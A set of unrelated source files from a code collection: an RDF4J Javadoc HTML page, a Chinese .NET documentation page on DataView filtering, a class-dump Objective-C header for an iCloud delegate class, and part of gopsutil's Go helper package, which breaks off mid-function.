<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_222) on Wed Aug 14 11:24:36 AEST 2019 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>LogConfigurator.LogReaderAction (RDF4J 2.5.4 API)</title> <meta name="date" content="2019-08-14"> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="LogConfigurator.LogReaderAction (RDF4J 2.5.4 API)"; } } catch(err) { } //--> var methods = {"i0":10,"i1":10}; var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/LogConfigurator.LogReaderAction.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a 
href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html" target="_top">Frames</a></li> <li><a href="LogConfigurator.LogReaderAction.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields.inherited.from.class.ch.qos.logback.core.joran.action.Action">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.eclipse.rdf4j.common.app.logging.logback</div> <h2 title="Class LogConfigurator.LogReaderAction" class="title">Class LogConfigurator.LogReaderAction</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">java.lang.Object</a></li> <li> <ul 
class="inheritance"> <li>ch.qos.logback.core.spi.ContextAwareBase</li> <li> <ul class="inheritance"> <li>ch.qos.logback.core.joran.action.Action</li> <li> <ul class="inheritance"> <li>org.eclipse.rdf4j.common.app.logging.logback.LogConfigurator.LogReaderAction</li> </ul> </li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>ch.qos.logback.core.spi.ContextAware</dd> </dl> <dl> <dt>Enclosing class:</dt> <dd><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback">LogConfigurator</a></dd> </dl> <hr> <br> <pre>public class <span class="typeNameLabel">LogConfigurator.LogReaderAction</span> extends ch.qos.logback.core.joran.action.Action</pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field.summary"> <!-- --> </a> <h3>Field Summary</h3> <ul class="blockList"> <li class="blockList"><a name="fields.inherited.from.class.ch.qos.logback.core.joran.action.Action"> <!-- --> </a> <h3>Fields inherited from class&nbsp;ch.qos.logback.core.joran.action.Action</h3> <code>ACTION_CLASS_ATTRIBUTE, CLASS_ATTRIBUTE, FILE_ATTRIBUTE, KEY_ATTRIBUTE, NAME_ATTRIBUTE, PATTERN_ATTRIBUTE, SCOPE_ATTRIBUTE, VALUE_ATTRIBUTE</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="fields.inherited.from.class.ch.qos.logback.core.spi.ContextAwareBase"> <!-- --> </a> <h3>Fields inherited from class&nbsp;ch.qos.logback.core.spi.ContextAwareBase</h3> <code>context</code></li> </ul> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor 
Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#LogReaderAction--">LogReaderAction</a></span>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#begin-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-org.xml.sax.Attributes-">begin</a></span>(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;name, <a href="http://download.oracle.com/javase/7/docs/api/org/xml/sax/Attributes.html?is-external=true" title="class or 
interface in org.xml.sax">Attributes</a>&nbsp;attributes)</code>&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#end-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-">end</a></span>(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;arg1)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.ch.qos.logback.core.joran.action.Action"> <!-- --> </a> <h3>Methods inherited from class&nbsp;ch.qos.logback.core.joran.action.Action</h3> <code>body, getColumnNumber, getLineColStr, getLineNumber, toString</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.ch.qos.logback.core.spi.ContextAwareBase"> <!-- --> </a> <h3>Methods inherited from class&nbsp;ch.qos.logback.core.spi.ContextAwareBase</h3> <code>addError, addError, addInfo, addInfo, addStatus, addWarn, addWarn, getContext, getDeclaredOrigin, getStatusManager, setContext</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.<a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a></h3> <code><a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#clone--" title="class or interface in java.lang">clone</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#equals-java.lang.Object-" title="class or interface in java.lang">equals</a>, <a 
href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#finalize--" title="class or interface in java.lang">finalize</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#getClass--" title="class or interface in java.lang">getClass</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#hashCode--" title="class or interface in java.lang">hashCode</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notify--" title="class or interface in java.lang">notify</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notifyAll--" title="class or interface in java.lang">notifyAll</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait--" title="class or interface in java.lang">wait</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-" title="class or interface in java.lang">wait</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-int-" title="class or interface in java.lang">wait</a></code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="LogReaderAction--"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>LogReaderAction</h4> <pre>public&nbsp;LogReaderAction()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="begin-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-org.xml.sax.Attributes-"> <!-- --> </a> <ul 
class="blockList"> <li class="blockList"> <h4>begin</h4> <pre>public&nbsp;void&nbsp;begin(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;name, <a href="http://download.oracle.com/javase/7/docs/api/org/xml/sax/Attributes.html?is-external=true" title="class or interface in org.xml.sax">Attributes</a>&nbsp;attributes)</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code>begin</code>&nbsp;in class&nbsp;<code>ch.qos.logback.core.joran.action.Action</code></dd> </dl> </li> </ul> <a name="end-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>end</h4> <pre>public&nbsp;void&nbsp;end(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;arg1)</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code>end</code>&nbsp;in class&nbsp;<code>ch.qos.logback.core.joran.action.Action</code></dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/LogConfigurator.LogReaderAction.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a 
href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html" target="_top">Frames</a></li> <li><a href="LogConfigurator.LogReaderAction.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields.inherited.from.class.ch.qos.logback.core.joran.action.Action">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2015-2019 <a href="https://www.eclipse.org/">Eclipse Foundation</a>. All Rights Reserved.</small></p> </body> </html>
{ "pile_set_name": "Github" }
--- title: 使用 DataView 进行筛选 (LINQ to DataSet) ms.date: 03/30/2017 dev_langs: - csharp - vb ms.assetid: 5632d74a-ff53-4ea7-9fe7-4a148eeb1c68 ms.openlocfilehash: 9b4c8e9730dde7d19df9e6a11052ae4591465ea7 ms.sourcegitcommit: 5b475c1855b32cf78d2d1bbb4295e4c236f39464 ms.translationtype: MT ms.contentlocale: zh-CN ms.lasthandoff: 09/24/2020 ms.locfileid: "91177457" --- # <a name="filtering-with-dataview-linq-to-dataset"></a>使用 DataView 进行筛选 (LINQ to DataSet) 使用特定条件筛选数据,然后通过 UI 控件在客户端中表示该数据的能力是数据绑定的一个重要特征。 <xref:System.Data.DataView> 提供多种方式来筛选数据并返回满足指定筛选条件的数据行子集。 除了基于字符串的筛选功能以外, <xref:System.Data.DataView> 还提供了对筛选条件使用 LINQ 表达式的功能。 LINQ 表达式允许执行比基于字符串的筛选更复杂而功能更强大的筛选操作。 使用 <xref:System.Data.DataView> 筛选数据有两种方式: - <xref:System.Data.DataView>使用 Where 子句从 LINQ to DataSet 查询创建。 - 使用 <xref:System.Data.DataView> 现有的基于字符串的筛选功能。 ## <a name="creating-dataview-from-a-query-with-filtering-information"></a>通过具有筛选信息的查询创建 DataView <xref:System.Data.DataView>可以通过 LINQ to DataSet 查询来创建对象。 如果该查询包含一个 `Where` 子句,则会使用查询中的筛选信息创建 <xref:System.Data.DataView>。 `Where` 子句中的表达式用于确定哪些数据行将包括在 <xref:System.Data.DataView> 中并作为筛选器的基础。 基于表达式的筛选器具有比基于字符串的简单筛选器更强大、更复杂的筛选功能。 基于字符串的筛选器和基于表达式的筛选器是互相排斥的。 如果在通过查询创建 <xref:System.Data.DataView.RowFilter%2A> 后设置基于字符串的 <xref:System.Data.DataView>,则会清除从查询推断的基于表达式的筛选器。 > [!NOTE] > 在大多数情况下,用于筛选的表达式不应有副作用且必须是确定的。 另外,表达式不应包含依赖于固定执行次数的任何逻辑,因为筛选操作可能会执行任意次。 ### <a name="example"></a>示例 下面的示例查询 SalesOrderDetail 表中数量大于 2 且小于 6 的订单,通过查询创建 <xref:System.Data.DataView>,并将 <xref:System.Data.DataView> 绑定到 <xref:System.Windows.Forms.BindingSource>: [!code-csharp[DP DataView Samples#LDVFromQueryWhere](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhere)] [!code-vb[DP DataView Samples#LDVFromQueryWhere](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhere)] ### <a name="example"></a>示例 下面的示例通过查询 2001 年 6 月 6 日以后达成的订单来创建 <xref:System.Data.DataView>: [!code-csharp[DP DataView 
Samples#LDVFromQueryWhere3](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhere3)] [!code-vb[DP DataView Samples#LDVFromQueryWhere3](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhere3)] ### <a name="example"></a>示例 筛选也可以与排序组合使用。 下面的示例通过查询姓氏以“S”开始并按姓氏排序,然后按名字排序的联系人来创建 <xref:System.Data.DataView>: [!code-csharp[DP DataView Samples#LDVFromQueryWhereOrderByThenBy](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhereorderbythenby)] [!code-vb[DP DataView Samples#LDVFromQueryWhereOrderByThenBy](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhereorderbythenby)] ### <a name="example"></a>示例 下面的示例使用 SoundEx 算法查找姓氏与“Zhu”相近的联系人。 SoundEx 算法在 SoundEx 方法中实现。 [!code-csharp[DP DataView Samples#LDVSoundExFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvsoundexfilter)] [!code-vb[DP DataView Samples#LDVSoundExFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvsoundexfilter)] SoundEx 是一种拼音算法,用于按英语发音来索引姓名,它最初由美国人口调查局开发。 SoundEx 方法返回一个表示姓名的四字符代码,由一个英文字母后跟三个数字构成。 字母是姓名的首字母,数字对姓名中剩余的辅音字母编码。 发音相近的姓名具有相同的 SoundEx 代码。 上一示例的 SoundEx 方法中使用的 SoundEx 实现如下所示: [!code-csharp[DP DataView Samples#SoundEx](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#soundex)] [!code-vb[DP DataView Samples#SoundEx](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#soundex)] ## <a name="using-the-rowfilter-property"></a>使用 RowFilter 属性 现有的基于字符串的筛选功能 <xref:System.Data.DataView> 仍适用于 LINQ to DataSet 上下文。 有关基于字符串的筛选的详细信息 <xref:System.Data.DataView.RowFilter%2A> ,请参阅对 [数据进行排序和筛选](./dataset-datatable-dataview/sorting-and-filtering-data.md)。 下面的示例从 Contact 表创建 <xref:System.Data.DataView>,然后设置 
<xref:System.Data.DataView.RowFilter%2A> 属性以返回联系人的姓氏为“Zhu”的行: [!code-csharp[DP DataView Samples#LDVRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvrowfilter)] [!code-vb[DP DataView Samples#LDVRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvrowfilter)] 在 <xref:System.Data.DataView> 从 <xref:System.Data.DataTable> 或 LINQ to DataSet 查询创建后,可以使用 <xref:System.Data.DataView.RowFilter%2A> 属性根据行的列值指定行的子集。 基于字符串的筛选器和基于表达式的筛选器是互相排斥的。 设置 <xref:System.Data.DataView.RowFilter%2A> 属性将清除从 LINQ to DataSet 查询推断的筛选表达式,并且不能重置筛选器表达式。 [!code-csharp[DP DataView Samples#LDVFromQueryWhereSetRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywheresetrowfilter)] [!code-vb[DP DataView Samples#LDVFromQueryWhereSetRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywheresetrowfilter)] 如果要返回特定数据查询的结果而不是提供数据子集的动态视图,则可以使用 <xref:System.Data.DataView.Find%2A> 的 <xref:System.Data.DataView.FindRows%2A> 或 <xref:System.Data.DataView> 方法,而不设置 <xref:System.Data.DataView.RowFilter%2A> 属性。 <xref:System.Data.DataView.RowFilter%2A> 属性最适合用于用绑定控件显示筛选结果的数据绑定应用程序。 设置 <xref:System.Data.DataView.RowFilter%2A> 属性会重新生成数据的索引,从而增加应用程序的系统开销并降低性能。 <xref:System.Data.DataView.Find%2A> 和 <xref:System.Data.DataView.FindRows%2A> 方法使用当前索引,而不要求重新生成索引。 如果只想调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 一次,则应使用现有的 <xref:System.Data.DataView>。 如果想要调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 多次,则应该创建一个新的 <xref:System.Data.DataView> 以便对想要搜索的列重新生成索引,然后调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 方法。 有关和方法的详细信息 <xref:System.Data.DataView.Find%2A> , <xref:System.Data.DataView.FindRows%2A> 请参阅 [查找行](./dataset-datatable-dataview/finding-rows.md) 和 [DataView 性能](dataview-performance.md)。 ## <a 
name="clearing-the-filter"></a>清除筛选器 使用 <xref:System.Data.DataView> 属性设置筛选之后,可以清除 <xref:System.Data.DataView.RowFilter%2A> 上的筛选器。 <xref:System.Data.DataView> 上的筛选器可以采用两种不同的方式清除: - 将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为 `null`。 - 将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为一个空字符串。 ### <a name="example"></a>示例 下面的示例通过查询创建 <xref:System.Data.DataView>,然后通过将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为 `null` 来清除该筛选器: [!code-csharp[DP DataView Samples#LDVClearRowFilter2](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvclearrowfilter2)] [!code-vb[DP DataView Samples#LDVClearRowFilter2](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvclearrowfilter2)] ### <a name="example"></a>示例 下面的示例从表创建 <xref:System.Data.DataView>,设置 <xref:System.Data.DataView.RowFilter%2A> 属性,然后通过将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为一个空的字符串来清除该筛选器: [!code-csharp[DP DataView Samples#LDVClearRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvclearrowfilter)] [!code-vb[DP DataView Samples#LDVClearRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvclearrowfilter)] ## <a name="see-also"></a>请参阅 - [数据绑定和 LINQ to DataSet](data-binding-and-linq-to-dataset.md) - [使用 DataView 进行排序](sorting-with-dataview-linq-to-dataset.md)
{ "pile_set_name": "Github" }
//
//     Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
//     class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//

#import <Foundation/NSObject.h>

@class NSDictionary;

// NOTE(review): this interface was recovered by class-dump from a compiled
// binary. Argument labels (arg1, arg2, ...) and the CDUnknownBlockType
// placeholder are class-dump artifacts, not the original source names/types.
// Any semantics suggested by the selector names below are inferences from
// naming only — verify against the binary before relying on them.
@interface iCloudAOSDelegate : NSObject
{
    BOOL _succeeded;
    NSDictionary *_userInfo;               // no public property visible for this ivar
    NSDictionary *_delegatesResponseDict;
    BOOL _needsRepair;
    BOOL _needsOptionalTOS;
    CDUnknownBlockType _notificationReceivedBlock;
}

// Block invoked on notification receipt — presumably set by the owner; TODO confirm.
@property(copy) CDUnknownBlockType notificationReceivedBlock; // @synthesize notificationReceivedBlock=_notificationReceivedBlock;
@property(readonly) BOOL needsRepair; // @synthesize needsRepair=_needsRepair;
@property(readonly) BOOL needsOptionalTOS; // @synthesize needsOptionalTOS=_needsOptionalTOS;
@property(readonly) NSDictionary *delegatesResponseDict; // @synthesize delegatesResponseDict=_delegatesResponseDict;
@property(readonly) BOOL succeeded; // @synthesize succeeded=_succeeded;

// ARC-synthesized ivar-release selector emitted by the compiler.
- (void).cxx_destruct;

// Private AOS (Apple Online Services) notification-observation helpers.
- (void)_stopObservingAOSNotificationsForOperation:(id)arg1;
- (void)_startObservingAOSNotificationsForOperation:(id)arg1 withCompletionBlock:(CDUnknownBlockType)arg2;
- (void)_processAuthenticateResponse;
- (void)_refreshFailed:(id)arg1;
- (void)_refreshCompleted:(id)arg1;
- (void)_validateNotOK:(id)arg1;
- (void)_validateOK:(id)arg1;

// Public-ish operations; BOOL returns likely indicate success — TODO confirm.
- (BOOL)logout:(id)arg1;
- (BOOL)completeSetupWithUsername:(id)arg1 password:(id)arg2 performAuthKitReauth:(BOOL)arg3 authResults:(id)arg4 delegateDictionary:(id)arg5 mobileMeDictionary:(id)arg6 selectedServices:(id)arg7 updatedAuthResults:(id *)arg8;
- (BOOL)getCommerceDelegateResponseForUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalDelegates:(id)arg4 error:(id *)arg5;
- (BOOL)validateiCloudUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalRequestAttributes:(id)arg4 delegates:(id)arg5 error:(id *)arg6;
- (BOOL)validateiCloudUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalRequestAttributes:(id)arg4 error:(id *)arg5;
- (BOOL)shouldUserGetOptionalTOS:(id)arg1;

@end
{ "pile_set_name": "Github" }
package common // // gopsutil is a port of psutil(http://pythonhosted.org/psutil/). // This covers these architectures. // - linux (amd64, arm) // - freebsd (amd64) // - windows (amd64) import ( "bufio" "bytes" "context" "errors" "fmt" "io/ioutil" "net/url" "os" "os/exec" "path" "path/filepath" "reflect" "runtime" "strconv" "strings" "time" ) var ( Timeout = 3 * time.Second ErrTimeout = errors.New("command timed out") ) type Invoker interface { Command(string, ...string) ([]byte, error) CommandWithContext(context.Context, string, ...string) ([]byte, error) } type Invoke struct{} func (i Invoke) Command(name string, arg ...string) ([]byte, error) { ctx, cancel := context.WithTimeout(context.Background(), Timeout) defer cancel() return i.CommandWithContext(ctx, name, arg...) } func (i Invoke) CommandWithContext(ctx context.Context, name string, arg ...string) ([]byte, error) { cmd := exec.CommandContext(ctx, name, arg...) var buf bytes.Buffer cmd.Stdout = &buf cmd.Stderr = &buf if err := cmd.Start(); err != nil { return buf.Bytes(), err } if err := cmd.Wait(); err != nil { return buf.Bytes(), err } return buf.Bytes(), nil } type FakeInvoke struct { Suffix string // Suffix species expected file name suffix such as "fail" Error error // If Error specfied, return the error. } // Command in FakeInvoke returns from expected file if exists. func (i FakeInvoke) Command(name string, arg ...string) ([]byte, error) { if i.Error != nil { return []byte{}, i.Error } arch := runtime.GOOS commandName := filepath.Base(name) fname := strings.Join(append([]string{commandName}, arg...), "") fname = url.QueryEscape(fname) fpath := path.Join("testdata", arch, fname) if i.Suffix != "" { fpath += "_" + i.Suffix } if PathExists(fpath) { return ioutil.ReadFile(fpath) } return []byte{}, fmt.Errorf("could not find testdata: %s", fpath) } func (i FakeInvoke) CommandWithContext(ctx context.Context, name string, arg ...string) ([]byte, error) { return i.Command(name, arg...) 
} var ErrNotImplementedError = errors.New("not implemented yet") // ReadLines reads contents from a file and splits them by new lines. // A convenience wrapper to ReadLinesOffsetN(filename, 0, -1). func ReadLines(filename string) ([]string, error) { return ReadLinesOffsetN(filename, 0, -1) } // ReadLines reads contents from file and splits them by new line. // The offset tells at which line number to start. // The count determines the number of lines to read (starting from offset): // n >= 0: at most n lines // n < 0: whole file func ReadLinesOffsetN(filename string, offset uint, n int) ([]string, error) { f, err := os.Open(filename) if err != nil { return []string{""}, err } defer f.Close() var ret []string r := bufio.NewReader(f) for i := 0; i < n+int(offset) || n < 0; i++ { line, err := r.ReadString('\n') if err != nil { break } if i < int(offset) { continue } ret = append(ret, strings.Trim(line, "\n")) } return ret, nil } func IntToString(orig []int8) string { ret := make([]byte, len(orig)) size := -1 for i, o := range orig { if o == 0 { size = i break } ret[i] = byte(o) } if size == -1 { size = len(orig) } return string(ret[0:size]) } func UintToString(orig []uint8) string { ret := make([]byte, len(orig)) size := -1 for i, o := range orig { if o == 0 { size = i break } ret[i] = byte(o) } if size == -1 { size = len(orig) } return string(ret[0:size]) } func ByteToString(orig []byte) string { n := -1 l := -1 for i, b := range orig { // skip left side null if l == -1 && b == 0 { continue } if l 